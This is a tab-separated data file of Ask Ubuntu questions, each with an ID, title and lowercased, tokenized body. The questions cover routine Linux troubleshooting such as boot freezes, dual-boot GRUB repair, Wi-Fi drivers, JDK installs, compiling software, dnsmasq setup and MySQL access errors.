428089	fresh install of xubuntu , freezes after login	80 % of the time , when i load my machine up , it freezes after login . now , we 're talking about a fresh install here with barely any additional software . if i keep restarting my machine , via the onboard button , i can usually get it to start without freezing after 6-10 attempts . sometimes , it even skips grub . what could cause this ? i 'm fairly new to linux so would n't really know which direction to look with regards to diagnosing these issues . not sure if it 's a coincidence , but i unplugged my wireless adapter one time and it loaded . the wireless adapter is part of the kernel 's automatically installed drivers for the rtl8192cu chipset . i did n't have to install/configure anything with this out of the box . edit i can confirm that the freeze appears not to be an issue with my wireless adapter . i just experienced the issue whilst the adapter was unplugged .
428094	i just try to install netbeans but there is more problem with jdk	hi , im new at ubuntu and i want to use netbeans . i downloaded netbeans from its web site then i wrote this commands to the line hakki @ hakki-k55vm : ~/downloads $ chmod +x netbeans-7.4-linux.sh hakki @ hakki-k55vm : ~/downloads $ sudo bash netbeans-7.4-linux.sh [ sudo ] password for hakki : configuring the installer ... searching for jvm on the system ... java se development kit ( jdk ) was not found on this computer jdk 7 is required for installing the netbeans ide . make sure that the jdk is properly installed and run installer again . you can specify valid jdk location using -- javahome installer argument . to download the jdk , visit http : //www.oracle.com/technetwork/java/javase/downloads after i get above notification i tried to install jdk with these commands hakki @ hakki-k55vm : ~ $ sudo apt-get install openjdk-7-jre-headless ... . ... . ... . ... . done then i controled jdk installed properly and it returned below lines hakki @ hakki-k55vm : ~ $ java -version java version `` 1.7.0_51 '' openjdk runtime environment ( icedtea 2.4.4 ) ( 7u51-2.4.4-0ubuntu0.13.10.1 ) openjdk 64-bit server vm ( build 24.45-b08 , mixed mode ) after i download jdk i tried to install netbeans again but still it returns error and it cant initialize ui . how can i solve this problem ? hakki @ hakki-k55vm : ~/downloads $ sudo bash netbeans-7.4-linux.sh configuring the installer ... searching for jvm on the system ... extracting installation data ... running the installer wizard ... can`t initialize ui running in headless mode exception : java.awt.headlessexception thrown from the uncaughtexceptionhandler i
428095	what 's the difference between lib32stdc++6 and libstdc++6 ( i386 )	as far as i know they both implement the same stuff . is the lib32stdc++6 kind of emulated version of ( i386 ) for 64 bit linux ?
428098	syncing files on ubuntu one	my laptop had a problem , so i reinstalled kubuntu 12.04lts . in that re-installation i lost the previously installed u1 . so now i 've reinstalled u1 too . but my question is , will it download previously uploaded folders ? and if the answer is yes , then how to stop u1 from downloading it ?
428099	external monitor is not working ubuntu 12.04	my laptop is amd processor based and i am connecting external dell monitor . i tried running gksudo amdcccle as instructed in in this forum but it crashes with the following error : ( process:2278 ) : glib-critical ** : g_once_init_leave : assertion `result ! = 0 ' failed ( process:2278 ) : glib-gobject-critical ** : /build/buildd/glib2.0-2.32.4/./gobject /gtype.c:2722 : you forgot to call g_type_init ( ) ( process:2278 ) : glib-critical ** : g_once_init_leave : assertion `result ! = 0 ' failed ( process:2278 ) : glib-gobject-critical ** : g_object_new : assertion `g_type_is_object ( object_type ) ' failed
428100	trying to make install zulucrypt but can not find packages	i have downloaded the source code of zulucrypt from http : //code.google.com/p/zulucrypt/ because there is no .deb file . this is my first time to install from source and i need a little help by doing this . while reading and following instructions from the build_instructions file , i have to install some packages first . then make a build dir , so i did . to build the backends as well as front ends , run the following command : cmake -dcmake_install_prefix=/usr/ -dcmake_build_type=minsizerel . .. i get this error message : -- checking for module 'blkid' -- package 'blkid ' not found -- checking for module 'pwquality' -- package 'pwquality ' not found -- checking for module 'tcplay' -- package 'tcplay ' not found cmake error at cmakelists.txt:47 ( message ) : error : could not find blkid package when i type in the terminal tcplay it explains what options are available for usage , so i guess it is already installed on my system . and i remember doing that with the command : apt-get install tcplay why can cmake command not find the package ? what do i do wrong ?
428105	how to restore windows 7 from boot on grub2	i have posted previously regarding a similar problem but now i 've managed to get a bit further following various tutorials and solutions of others , not being sure of what 's really going on though or the fact that it 's quite a tailor made situation . you can find a link below of the boot-repair url chucked out after i tried to restore the mbr . http : //paste.ubuntu.com/7018148/ background info i have an ssd with windows 7 and a hdd with ubuntu 13.10 currently booting using grub2 ( i believe , the background is purple if thats what makes it 2 ) ( i would like to boot from my ssd , but at the moment getting windows to work any way possible is fine with me ) recent trials i have tried changing the bios settings to make ssd top of list ; windows says bootmgr is missing the windows repair cd does n't allow me to repair the boot i tried doing something along the lines of this tutorial here ! i 'm sure theres a solution . out of fear of having damaged my windows drive all the files are still there so i would like to believe my installation process was correct . i created partitions on the 2nd drive as per standards so as to have : a boot partition a root partition a normal space a linux-swap
428109	`` boot error when trying to install ubuntu from usb	i am trying to install ubuntu from my usb but i get a `` boot error ... '' . it says that i donâ´t have all the devices required in order to boot from a usb . which are these devices ? can i find them somewhere ? how do i install them ? thanks for your help , i will appreciate it.. ! ramon
428111	google dictionary in ubuntu	is it possible to install google dictionary extension / plugin in entire ubuntu os as well as in mozilla ? here is an example extension for google dictionary for the chrome web browser .
428116	problem installing ubuntu 13.04 alongside windows 7	i have windows 7 , i ran ubuntu live cd mode , after asking for try or install , i clicked install . tick the both check box of update and third party software . after a while it gotto next step . i ticked install along side windows 7 , it now ask to restart and continue , i clicked and suddenly its a black screen with some text written `` permission to suspend all process '' ... kind of something ... . and then the cd ejected and nothing happens , after pressing any key it restarts and again it starts from live cd ... i have also tried to skip the update check box ... and directly choosing install along side windows , still the same . also the cd is running perfectly fine with try ubuntu mode . help me .
428119	all http client applications appear broken	i am using 13.10 on my laptop . all of my http applications seem to have stopped working . i can ssh and ping as usual . dns is resolving fine using dig . so it does not seem to be a network or dns problem . as far as i know there is no proxy server configured , and other computers on the same wifi network ( i.e . the one i am on now ) are working fine . however firefox , wget and apt-get have all stopped working . firefox just shows the page loading animation forever , wget is stuck at `` http request sent , awaiting response '' , and apt-get gets stuck at `` waiting for headers '' . i suspect this might be related to an update from ubuntu . perhaps some library they all use is broken ? any ideas what might be going on ? or how to diagnose this issue ?
428125	how to boot windows 8 with ubuntu	i am new at ubuntu i have a sony notebook whit pre . installed windows 8 , and ubuntu studio 13.10 , and can only boot ubuntu i put up the grub to sda3 , and mount the windows 8 partition to boot whit g part , but then i find out that it lays on sda2 , when i boot windows 8 it says that it can not load image , and has set it up to an windows boot mange ( uefi /dev/sda3 ) , and i do n't know what to do to boot windows 8 . thanks .
428127	easiest way to install jre on ubuntu ?	so i am looking for a simple way to install jre on ubuntu . i am a linux noob so i need some help in this . is there a command i can use in the console ?
428128	ubuntu 13.04 wireless connection problem	i installed 13.10 and i use it for 2 days . everything was good until now . i just install jdk and netbeans and i restart my computer . now i can see wi-fi connections as always but it does not connect . what changed after i restart my pc ? my ethernet connection works properly . how can i fix it ?
428129	install error - try ( hd0,0 ) : ntf5 : move memory fails	i am trying to install lubuntu 13.10 on a a dell latitude 505 but it would n't boot automatically on reboot with disc in the drive . i had to install some boot file , that the disc suggested . now on boot , at the screen where it says to choose operating system , i arrow down from windows xp pro , to lubuntu . then when i hit enter , nothing happens . it does n't feel or sound like the drive is running . i have let it sit for an hour but still nothing happens . i have tried rebooting my computer several times but the same thing happens . i have noticed though that before i choose the op system , i can hit f8 and go into the advanced startup options . help ! ok , made it past that , just had to unplug the external mouse and keyboard . now i have a new issue , message is try ( hd0,0 ) : ntf5 : move memory fails any thoughts ? should i go wipe out my windows install altogether first ?
428130	why my remote control does not work in ubuntu ?	i switched from opensuse to kubuntu because of bad funtion of xbmc in opensuse , but in kubuntu my remote control does not work out of the box , this related with systemd ? because in archlinux the remote control also works out of the box . 01:08.0 multimedia controller : philips semiconductors saa7134/saa7135hl video broadcast decoder ( rev 01 )
428132	error during make	i am new to linux yet , i am trying to make robocup soccer file and at 63 % i am getting following error : linking cxx shared module collisionperceptor.so /usr/bin/ld : can not find -ltbb collect2 : ld returned 1 exit status make [ 2 ] : *** [ plugin/collisionperceptor/collisionperceptor.so.0.0.0 ] error 1 make [ 1 ] : *** [ plugin/collisionperceptor/cmakefiles/collisionperceptor.dir/all ] error 2 make : *** [ all ] error 2
428134	transferring license keys when restoring from backup	i 've got ubuntu 13.10 and i was using libreoffice which ended up being quite problematic as i did n't find it very intuitive to use . i found that i could use wine to put microsoft office on ubuntu . however i 'm planning on making another computer and transferring data from my mbp to the computer . will the license key transfer so i do n't have to buy another license key for it ?
428139	how can i access an attribute of the selected option in an optionselector ?	i have an optionselector that delegates to an optionselectordelegate , and has a listmodel for the model . how should i access the `` sometext '' attribute of the listelements ? optionselector { id : optionselector model : listmodel delegate : delegator } component { id : delegator optionselectordelegate { text : name } } listmodel { id : listmodel listelement { name : `` name '' ; sometext : `` text '' } listelement { name : `` name '' ; sometext : `` more text '' } }
428142	ubuntu 12.04 wont recognize raspberry pi on ethernet	i messed up my ubuntu 12.04 , so i reinstalled it , now every-time i try to connect to my raspberry pi from my laptop via an ethernet cable ( using ssh ) . it keeps on saying the `` wired network disconnected '' every once in a while , but ifconfig does not show anything connected to my laptop . i have also tried connecting to the default ip it usually gave me but that wont work either . i tried running it via putty and xming on my windows 7 , and it runs ok , so it is not hardware problems , neither a raspberry problem .
428143	how to get host-name from dhcp server via network manager ?	i can get hostname and ip address from dhcp server with invoking the script under /etc/dhcp/dhclient-exit-hooks.d/ directory as explained here on client side . edited : i assigned host-name and ip address in /etc/dhcp/dhcpd.conf on server side : ... host slave1 { hardware ethernet 00:50:56:89 : a5:90 ; fixed-address 192.168.1.100 ; option host-name `` slave1 '' ; } ... but it stopped after installed network manager . i realize that network manager does n't invoke scripts under /etc/dhcp/dhclient-exit-hooks.d/ directory . after some research , i found that i can run a script under /etc/networkmanager/dispatcher.d/ directory as explained here . i tried it ( moved file , then gave permissions ) but it didnt work . because i can not reach variables like $ reason , $ interface , hostname etc . under that directory . i 'm stuck here . so is there a way to get hostname from dhcp server via network manager ? or how to run a script under dhclient-exit-hooks.d directory on boot even if network manager runs ?
428145	install zpanel on localhost	i have tried to follow zpanel documentation , however , its very hard to follow as it is not written by someone who uses english as their primary language . i am trying to learn how to install zpanel on an ubuntu localhost ( no registered domain name ) . my system is as follows ; static external ip address , windows 7x64 host , vmvirtualbox ubuntu 12.04x64 bit ( 1024 mb ram , 8 gb storage ) , network adapter set to bridged , 1 shared folder on win 7 host , port forwarding - ftp , http , filezilla & mail server ( all to my virtualbox internal ip address ) . lamp has not been installed . how do i configure a localhost domain name to work with zpanel ? from the documentation it seems as if i can simply add any domain name i like to the /etc/hosts file ( i copied what they had written ) ... however it doesnt seem to work . i can ping the vm-virtualbox machine using both internal and external ip addresses from the windows 7 host without any problems . also , the documentation says that after the hosts file has been edited i should be able to go to my browser , enter the ip address or subdomain name and something should come up ... how can this happen if no http server is running ? ? ? ( id the documentation says that the ubuntu server must be a minimal install and that apache , mysql , dovecot etc must not be installed ) . this is so bloody confusing ... so many conflicting statements in the documentation .
428153	how can i change the default downloading folder for transmission ?	i would like to change the folder but i do n't know where can i configure tranmission .
428161	kde dashboard settings do n't show up	i 'm using the widget dashboard in kde4 . when i right-click it and select `` desktop dashboard settings '' , nothing happens . no window shows up on none of my desktops . what is the matter here ? i 'm using kubuntu raring ( ubuntu with kubuntu-desktop installed and unity purged . and i know it 's eol , i 'm going to reinstall when trusty is out )
428165	broken package system	my computer froze during an update and now it does this when i try to update : the following packages have unmet dependencies : gnome-bluetooth : depends : gir1.2-gnomebluetooth-1.0 ( = 3.2.2-0ubuntu5.1 ) but 3.2.2-0ubuntu5 is installeddepends : bluez ( > = 4.36 ) but 4.98-2ubuntu7 is installeddepends : udev ( > = 154 ) but 175-0ubuntu9.4 is installed details : the package system is brokencheck if you are using third party repositories . if so disable them , since they are a common source of problems.furthermore run the following command in a terminal : apt-get install -f what does apt-get install -f do when you run the command in the terminal ? i am new to ubuntu and to not want to crash it ... please help
428167	how can i view my stored media on my ps3 on my ubuntu server ?	i have recently installed ubuntu server and setup samba i believe to use as a general use home server . how do i go about making this server available to my ps3 so that i can view my stored media on my ps3 ? i enjoy the ubuntu server over ubuntu desktop because of the wimpy computer specs . idk if you need to know the following information , but i will include it anyways . computer is 2.4ghz only an 80 gb hd ( pata/ide ) 512mb ddr ram ubuntu server 12.04.4 samba v ? i set up an ubuntu file server using this youtube video tuturial .
428170	computer error `` sorry , ubuntu 12.04 has experienced an internal error . ''	i recently installed ubuntu on an old computer and then this error popped up , later i did a fresh install and the same error popped up . the error says '' executablepath /usr/bin/jockey-gtk package jockey-gtk 0.9.7-0ubuntu7.13 problemtype crash title jockey-gtk crashed with dbusexception in call_blocking ( ) : org.freedesktop.dbus.error.timedout : activation of com.ubuntu.devicedriver timed out '' there are a lot more things but their mostly computer specs , what do i need to do ?
428176	ubuntu 12.04 apache 2 - inline css working but external css not working	in installed apache2 for use as a development server . created my site , and it loads correctly in my browser , except that ... external css stylesheets do n't load . inline css works , and the style tag works , but link rel= '' stylesheet '' type= '' text/css '' href= '' style.css '' does n't seem to do anything . my apache2.conf is unedited . here are my php5.conf file and my site conf file , in case they are needed : mods-enabled/php5.conf < ifmodule mod_php5.c > < filesmatch `` \.ph ( p3 ? |tml ) $ '' > sethandler application/x-httpd-php < /filesmatch > < filesmatch `` \.phps $ '' > sethandler application/x-httpd-php-source < /filesmatch > < filesmatch `` .+\.html $ '' > sethandler application/x-httpd-php < /filesmatch > < filesmatch `` .+\.htm $ '' > sethandler application/x-httpd-php < /filesmatch > < filesmatch `` .+\.xhtml $ '' > sethandler application/x-httpd-php < /filesmatch > # to re-enable php in user directories comment the following lines # ( from < ifmodule ... > to < /ifmodule > . ) do not set it to on as it # prevents .htaccess files from disabling it . < ifmodule mod_userdir.c > < directory /home/*/public_html > php_admin_value engine off < /directory > < /ifmodule > < /ifmodule > sites-enables/au.camarillo.conf namevirtualhost au.camarillo < virtualhost au.camarillo > serveradmin daniel @ camarillo # we want to be able to access the web site using www.au.camarillo or au.camarillo serveralias www.au.camarillo documentroot /home/daniel/sites/au # we want specific log file for this server customlog /var/log/apache2/au.camarillo-access.log combined < /virtualhost >
428179	edited : how do i find my /home file ?	when i installed ubuntu on my mbp i only made the linux swap partition and the `` / '' partition . i was looking for my /home file and searched for it but i came up empty handed . i 'm guessing i should have installed more folders when i installed ubuntu what should i do ? edit : some of the comments below do n't make sense with the edits i 've made , so ignore them and look at the answer .
428182	changing editor in abcde	i ran abcde , but wanted to edit the cd information . when i said yes , it gave me a menu of editors to choose from . i unintentionally selected nano as the editor . i canceled c-c 'd the process . now when i run abcde it automatically uses the nano editor , which is not what i want . where/how does abcde keep the editor choice selection ? note : there is no ~/.abcde.conf in my home directory . the system wide /etc/abcde.conf does not include information on the editor choice . i ca n't figure out how the selection i made during one run is getting to my current attempts .
428185	dual boot not working correctly	i am a complete noob to linux i just installed ubuntu today alongside windows 8 and right off the start i am having problems . my first problem i am having is that occasionally when i am starting my computer it will begin to boot get past the bios then it seems as though the computer shuts down and the monitor goes to sleep for a few seconds . it will then start back up and boot straight to ubuntu without allowing me to pick which os i want to boot to . the weirdest part is it only does this sometimes . other times it works fine . i have tried getting boot repair but every time i run the prompt in the terminal it says complete but i can never find the file fro boot repair if it even installed . i am thinking about uninstalling ubuntu but i do not know how to to do this safely as i do not have the windows 8 recovery disk or anything of that sort . if anyone could help me i would be so happy if i could resolve these issues . thank you sorry for the long post .
428186	kubuntu 12.04 goes to black screen after hdd icon starts loading	i 've been using kubuntu for a while because i do n't like the ubuntu desktop . i was using my laptop and then it just shut down . when i plugged it to the ac it was booting fine , until the part where kubuntu shows the system symbols . when the hdd symbol is loading the screen just becomes black with a red `` - '' blinking in the top left corner . i ran the computer in recovery mode and when it gave me the root shell i tried startx to see if it works , and when the hdd symbol is loading the screen comes back to the shell with xinit : connection to x server lost it is an old notebook hp pavilion dv2000 64bits kubuntu 13.10 amd turion 2gb ram 150gb hdd
428187	how to get canon d1150 printer working on ubuntu 12.04	installed ubuntu 12.04 just a few days ago . seems to be running fine ( on amd 64 bit system ) . also installed driver for imageclass d1150 from canon 's website . in printer policies it says printer is enabled and accepting jobs . but when i try to print there is no response from the printer . nor will it print a test page . each print job is assigned a number . job appears in the print queue for an instant and then disappears . there is absolutely no response from the printer . have connected it both via usb and via network with same result .
428188	sound card problem	in ubuntu 12.04 the sound card worked fine under linux-image-3.2.0-58-generic after upgrading to linux-image-3.2.0-59-generic my sound card stopped working this is on a dell t110 with a syba 7.1 surround sound pci-e audio card i ran through the troubleshooting here with no luck i checked alsamixer and nothing was muted any suggested fixes ?
428193	ubuntu 13.10 and wifi in dell latitude d620	i am new to the linux operating system . ( i just finish the installation of the desktop version of it in one of my test laptops right now ) the laptop is dell latitude d620 . wifi is not available . because i am new to linux and also ubuntu 13.10 , i do not know how to install the required driver to enable the wifi is there any instruction for linux commands ? is there any step by step instruction to guide me to enable the wifi in ubuntu 13.10 ?
428194	unable to connect to network with ubuntu/tor ?	i 'm really new to these programs and was wondering if i could get some crucial help . i 've been trying to set up a secure browser using ubuntu/tor from this tutorial : i finished setting things up but it wont even work . when i open firefox it says `` the proxy server is refusing connections '' and `` wired network - disconnected , you are now offline '' . i thought i followed everything correctly , why is it not working ? using ubuntu version 12.04 i was going to share some code that i thought might be helpful , but for some reason i was n't allowed to copy any over . i took a picture : screen print did n't work either so i had to take it with my phone . sorry about that . if there 's any additional information you need , please let me know what and how to get it to you . i 'm sorry if my question is n't very good , i just do n't really know what to do from here .
428197	how to install wireless adapter usb without putting in cd	i just finished my first ever build and installed ubuntu on it . a day later i bought myself a linksys ac1200 wireless usb adapter , and i have been trying to install it ever since . in my infinite wisdom , i forgot to order and install a cd rom in my build . i now have to do everything via usb . i tried burning the files of the adapter cd onto a bootable usb on my mac laptop , and then i tried to plug that into my computer . i was only able to navigate through the files and i could not run the cd at all . i have no idea what to do . i might have even tried copying the entire cd onto the usb and trying that , but once again all i could do was navigate through the files . i have no idea what to do .
428198	getting + installing gcc/g++ 4.9 on ubuntu ?	how do i install the latest version of gcc and g++ ? i am using a variety of c++11 and c++1y features ; which is why i need this .
428203	trying to install and keeps going to white screen	i downloaded ubuntu on my computer so that i could burn it to a dvd-r disc , and now i am trying to put it on my daughter 's laptop ( her computer crashed ) . the ubuntu purple screen showed up , then a black screen with small type came on . after that , i was left with a bright white screen . i have tried it twice and i do n't know what to try next . she has a refurbished acer computer that had windows 8 , but that stopped working within a month .
428204	lenovo g505 , windows 8 pre-installed ; are my reasons for switching over to ubuntu `` reasonable '' ?	i need to get work done . i really do . that 's my primary concern . i really like the idea of foss , community developed tools , openness , ubuntu ( the spirit ) , all of that -- but i really need to get work done . here 's the kind of work i need to do : a lot of web-browsing with plenty of tab opens ( e.g . when i need to find research documents ) reading pdf documents , highlighting things inside of them , making notes inside them ( highlight + note ) write python/haskell programs write latex documents use mathematica/maple/matlab ( mostly matlab ) my computer is really cheap ( ~ $ 300 ) ; i am a poor student , and it was a godsend , so i still love it . however , it really ca n't even handle point 1 ) on my list properly . i have to consciously control stuff like this : i ca n't have a pdf file open while spyder is running ; things would just bog down really fast . i ca n't open more than ~10 tabs . i have to force myself to do one thing at one time as much as possible ( good for me to a certain extent ! ) you get the idea . i am hoping that switching to ubuntu ( lubuntu specifically ) will help my computer in terms of performance . is this reasonable to expect ? here are some of the issues i am aware of : uefi stuff various hardware compatibility issues time , lots and lots of time to get things working here 's how my computer would be ideally set up : main partition would be some lightweight version of ubuntu secondary ( ~15 gb ) partition with windows for the stuff that just needs windows i have played around with ubuntu before ( 2009 - on a better laptop , in happier days when i did n't need to do much apart from making my desktop setup look cool ... ) . i remember eventually becoming tired of it because of little things that just would n't work either because i did n't know how to use a gnu/linux system properly , and to a smaller extent because ubuntu just had some rough edges . should i make the switch ?
428205	wallpaper goes missing evertime i boot	every time i boot my system running ubuntu 12.04 , i get a black screen instead of my designated wallpaper . can anyone shed light on the cause and suggest a remedy ?
428206	samsung chromebook and the new wacom intuos pen and touch tablet	i would like to use my new wacon intuos pen and touch tablet with my chromebook . i installed ubuntu unity 12.04 on my samsung chromebook . i works well . i have seen a that there is some kind of wacom driver or something already installed with this version of ubuntu ( wacom graphics tablet ) . saddly , when i plug the device ... nothing . it powers on but that is all .
428207	lan not working in ubuntu 12.04	i ran the below code to find my ethernet controller which is ethernet - realtek rtl8101e/rtl8102e ; wireless : bcm4312 lspci -nn | grep 0200 i got the below information . 09:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 02 ) can anyone help me out on what to do to fix this ? . my wifi too is not working , i need to fix the lan and then try to fix the wifi .
428208	wifi adapter worked from 12.04 dvd but wo n't connect after installing ub 12.04	i really do n't get it , my wifi worked fine when i booted from dvd but after installing ub 12.04 my wifi only detects all aps but i suddenly ca n't connect to any of 'm and my neighbor upstairs and me are sharing his broadband connection ( so i can only connect to the internet via wifi and not by cable ) i 'm so pissed off , i donated $ 25 when i was asked for a donation before downloading ub 12.04 , because of the `` good '' first impression i got from the trial i thought , why not , it works fine which it did until i installed ub 12.04 and got stuck , i 'm writing this on a damn tablet , ai n't that great ? how can i download necessary drivers if i ca n't get my pc connected ? i have a sweex rt73 and a built in wifi adapter ralink technology corp 802.11n wireless lan card , but i 'd rather not use the built in card because i have a much better signal on the sweex rt73 wifi stick i also tried tethering my pc with a tablet but after a few seconds ub disconnects the usb connection to the tablet , so no network there either
428210	please clarify : using sftp on lan for development	after so many years of working with ftp on ubuntu , i 'm now confused . i read on many docs that ftp is insecure and that sftp or ssh is the best way to go . but here 's what i want to do ... we are a group of 4 users on a lan . the ubuntu server modules ( eg : lamp stack , postgres , etc ) are actually on an ubuntu desktop os . anyway , we 're using it as a server . i need for each user to log-in from their pcs ( usually ubuntu ) and update their work in /var/www and other shared folders . not everyone has access to every folder . so i guess creating ftp accounts for each user is a good way to go . now , since many people suggest that open-ssh or sftp is the way to go , i 'd like to know the following : is it correct to assume that ssh applies to a machine and not to a user ? so if this is the case users will need to stick to a single computer . does sftp work the same way as ftp where user names can be created with restricted upload/download rights ? is it really a bad idea to continue using ftp instead of the more 'secure ' alternatives since i 'm on a lan ? pretty confused and really appreciate your inputs !
428213	how to change terminal theme / behavior ?	like excel / .net / java can terminal also be a user friendly ? in current scenario it 's single colour window single font and working with merely zero gui , limited people who are aware about commands and their uses of terminal can work in terminal for others it 's just an application example which can help user to build more interest in using terminal as more as he can : look and feel of terminal gui control instead of writing more commands pick and drag option auto fill the command option should be there list of commands which user can write whenever he type anything on terminal any alphabet or any numeric a / b / c / ... / z brief summary about each command should also comes there for him to understand to get more information on that command a person should have an option to view the entire help section in new window as as user who use computer for nearly 16- 18 hours a day and work on all bits and pieces available i work , but i do n't know the coding.. like the idea of ask ubuntu so chalking down my thoughts here ... thanks !
428216	suspend ubuntu with keyboard shortcuts	i there any keyboard shortcut of suspending the system like we have alt+cntl+l for locking .
428218	how can i read a drm-based ebook ?	i 've got xubuntu 13.10 and i ca n't figure out how to run this link ( see screenshot ) for a free ebook . on my windows computer i have to open the link via adobe ( via a password ) and then it opens in adobe digital editions 2.0 . how can i run it in xubuntu ?
428220	ca n't run make - gcc : command not found	i 'm trying to follow a tutorial to get cudaminer working on linux . i have painstakingly installed nvidia drivers , cuda 5.0 and incidentally i 'm failing on the last step when i run make : make all-recursive make [ 1 ] : entering directory `/var/progs/cudaminer' making all in compat make [ 2 ] : entering directory `/var/progs/cudaminer/compat' making all in jansson make [ 3 ] : entering directory `/var/progs/cudaminer/compat/jansson' gcc -std=gnu99 -dhave_config_h -i . -i../.. -g -o2 -mt dump.o -md -mp -mf .deps/dump.tpo -c -o dump.o dump.c /bin/bash : gcc : command not found make [ 3 ] : *** [ dump.o ] error 127 make [ 3 ] : leaving directory `/var/progs/cudaminer/compat/jansson' make [ 2 ] : *** [ all-recursive ] error 1 make [ 2 ] : leaving directory `/var/progs/cudaminer/compat' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/var/progs/cudaminer' make : *** [ all ] error 2 i 'm pretty sure i have gcc , in fact i have multiple versions of it . i installed version 4.6 ( which is what cuda requires ) but it does n't seem to find it . i 'm so close ! thanks in advance .
428229	my internet connection stopped working !	i have recently switched from windows to xubuntu 13.04 . after downloading and setting up i had connection to my internet . in a short while the connection disappeared and now i have no connection at all , and am unable to find any connection . the other devices in my house appear to be running fine . i 'm extremely new to linux so any help would be greatly appreciated ! i am also using an acer aspire laptop .
428231	what 's an effective text editor for html code violation warnings ?	i 'll be using the text editor to clean up the bloat from a word doc saved as `` web page filter '' ( ie . html ) . then i am going to convert the .html into a .epub . eventually it will be on amazon et al . as an ebook ( novel ) . i am using xubnutu 13.10 , 32 bit . what i have used that worked very well for me in the past ( and i know this is an epub editor ) was sigil . when i 'm working there and i make an error in an html tag right away a big red warning pops up in the companion `` view '' screen and then i stop and set right the error . the key feature i 'm looking for is this code violation notification . other features would be snytax highlighting and search and replace . and it would be nice if it was available for free .
428234	nvcc not found , but only when using sudo	i ca n't get anything working on linux . i 'm trying to compile cudaminer . sudo make : ypt-jane.o `test -f 'scrypt-jane.cpp ' || echo './'`scrypt-jane.cpp mv -f .deps/cudaminer-scrypt-jane.tpo .deps/cudaminer-scrypt-jane.po nvcc -g -o2 -xptxas `` -abi=no -v '' -arch=compute_10 -- maxrregcount=64 -- ptxas-options=-v -i./compat/jansson -o salsa_kernel.o -c salsa_kernel.cu /bin/bash : nvcc : command not found make [ 2 ] : *** [ salsa_kernel.o ] error 127 make [ 2 ] : leaving directory `/var/progs/cudaminer' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/var/progs/cudaminer' make : *** [ all ] error 2 so , kind of interesting : nvcc : nvcc fatal : no input files specified ; use option -- help for more information whereas sudo nvcc : sudo : nvcc : command not found huh ? ? i have identical exports listed in ~/.bashrc and /etc/bash.bashrc . ( nvcc is located in : /usr/local/cuda-5.0/bin/nvcc ) i also tried changing the current path , to no avail : $ sudo bash -c 'echo $ path' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin $ path= $ path : /usr/local/cuda-5.0/bin/nvcc $ sudo bash -c 'echo $ path' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin thanks in advance !
428236	dnsmasq not serving up hostnames on hostapd network	my goal is for clients to be able to connect to my wifi access point and access services on it using a hostname . currently clients can connect and get assigned an ip by dhcp , but they can not resolve a hostname . i have disabled network-manager 's dnsmasq . /etc/network/interfaces : auto lo iface lo inet loopback auto wlan1 iface wlan1 inet static address 192.168.0.1 broadcast 192.168.0.255 netmask 255.255.255.0 /etc/hosts : 127.0.0.1 localhost 127.0.1.1 foo 192.168.0.1 foo /etc/hostapd/hostapd.conf : interface=wlan1 driver=nl80211 ssid=foo hw_mode=g channel=1 macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0 /etc/dnsmasq.conf : interface=wlan1 dhcp-range=192.168.0.1,192.168.0.150,12h /etc/resolv.conf : nameserver 127.0.0.1 search domain.invalid dig @ 192.168.0.1 foo : ; ; answer section : foo . 0 in a 127.0.1.1 foo . 0 in a 192.168.0.1 when i connect to wlan1 with a windows machine , it gets assigned ip 192.168.0.100 , dhcp server = 192.168.0.1 , dns server = 192.168.0.1 . but if i run ping foo it ca n't resolve the hostname . thanks for your help .
428237	no brightness control in ubuntu 12.04 , lenovo v570	i have been struggling now for an inordinate amount of time trying to get the brightness adjustment working in ubuntu . i am running ubuntu 12.04 on a lenovo v570 laptop . i have tried all of the adjustments i can find to `` fix brightness control '' in the /etc/default/grub file with the following results ( before you ask , yes i did run sudo update-grub and sudo reboot after each change ) : grub_cmdline_linux_default= '' quiet splash acpi_osi= '' result : no response to buttons , slider has no affect . grub_cmdline_linux_default= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' result : no response to buttons , slider has no affect . grub_cmdline_linux_default= '' splash quiet acpi_osi= ' ! windows 2012 ' '' result : limited response to buttons from os ( slider only moves down one tick , then sticks ) , no dimming , slider has no affect . grub_cmdline_linux_default= '' splash quiet '' result : os responds to buttons , but screen does not dim . slider has no affect . am i missing something ? what can i do to adjust the brightness ? update : i did more searching , and i found that in /sys/class/backlight i have both acpi_video0 and intel_backlight . by changing the `` brightness '' file in each of these folders , i discovered , that editing the /sys/class/backlight/intel_backlight/brightness changed the actual brightness setting on my screen . how do i get ubuntu to adjust this setting ? any hope of getting my function keys to also adjust it ? update2 : as requested , here is the output from lspci : $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 )
428239	wget and ssl downloads over proxy	whenever i try to download a https page using wget over a proxy i get the following error proxy tunneling failed : bad requestunable to establish ssl connection . there is a launchpad bug https : //bugs.launchpad.net/ubuntu/+source/wget/+bug/994097 but like many such bugs it is drifting in limbo . can anyone help me debug the issue ? where should i even begin to try a ) find out what the problem is and b ) develop a patch to fix it i want to learn to make useful submissions to help but i do n't know how.. any help will be appreciated .
428240	how can i uninstall files ( nautilus ) and use pcmanfm as my default file manager ?	i 've installed `` file manager pcmanfm '' and now i want to uninstall the default file explorer `` files '' from my ubuntu and make pcmanfm my default explorer . i tried sudo apt-get remove file but it did n't work . how can i uninstall `` files '' and make pcmanfm my default file manager ?
428243	mysql access denied for user 'root ' @ 'localhost '	in my server , everytime i try to access mysql i get the error : access denied for user 'root ' @ 'localhost ' ( using password : no ) when i try mysqladmin -u root -p password i get access denied for user 'root ' @ 'localhost ' ( using password : yes ) how can i access mysql in my ubuntu server 12.04 ?
